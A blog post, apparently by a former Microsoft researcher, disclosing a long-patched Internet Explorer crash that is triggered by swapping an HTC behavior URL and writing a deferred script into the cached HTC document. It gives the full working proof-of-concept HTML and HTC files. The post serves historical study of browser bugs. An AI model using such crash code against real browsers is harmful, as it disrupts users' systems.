DoS - HTC Cached Document

Changing an HTC behavior’s URL to cache its document, then changing it back, and then writing an innerHTML with a deferred script to the cached HTC document crashes IE. The size of the HTC file matters — if it’s too short, the crash doesn’t happen.

index.html:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>DoS_htc_cachedDocument</title></head>
<body style="behavior:url(htcfile.htc)">
<font face="Tahoma" size="2">
<center>
<h2>DoS_htc_cachedDocument</h2>
<input type="button" onclick="crashMe()" value="Crash me in two seconds"><br /><br />
</center>
<hr />
PS: it's <u>very important</u> the size of the htc file itself. If it's too short, it won't crash.

</font>

<script language="JavaScript">
var secondHTC;

function crashMe()
{
	document.body.style.behavior = 'url(htcfile.htc?getDocument)';
	setTimeout("document.body.style.behavior = 'url(htcfile.htc)';",1000);
	setTimeout("secondHTC.body.innerHTML = '.<script defer>alert()<\/script>';",2000);
}
</script>
</body>
</html>

htcfile.htc:

<script language="JavaScript">
if (document.URL.indexOf('getDocument') != -1)
{
	window.secondHTC = document;
}

/*
IF_YOU_REMOVE_THIS_TEXT_IT_WONT_CRASH___IF_YOU_REMOVE_THIS_TEXT_IT_WONT_CRASH___IF_YOU_REMOVE_THIS_TEXT_IT_WONT_CRASH
IF_YOU_REMOVE_THIS_TEXT_IT_WONT_CRASH___IF_YOU_REMOVE_THIS_TEXT_IT_WONT_CRASH___IF_YOU_REMOVE_THIS_TEXT_IT_WONT_CRASH
IF_YOU_REMOVE_THIS_TEXT_IT_WONT_CRASH___IF_YOU_REMOVE_THIS_TEXT_IT_WONT_CRASH___IF_YOU_REMOVE_THIS_TEXT_IT_WONT_CRASH
IF_YOU_REMOVE_THIS_TEXT_IT_WONT_CRASH___IF_YOU_REMOVE_THIS_TEXT_IT_WONT_CRASH___IF_YOU_REMOVE_THIS_TEXT_IT_WONT_CRASH
*/
</script>

The bulk text in the HTC file is load-bearing — removing it prevents the crash. This suggests the crash is related to the size of the HTC document’s internal memory allocation. When innerHTML with a deferred script is written into the cached (now “dead”) HTC document, accessing the script’s execution context causes an access violation.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [UXSS - SWF frameElement] :: [UXSS - HTC setCapture Variation - Case 6445] >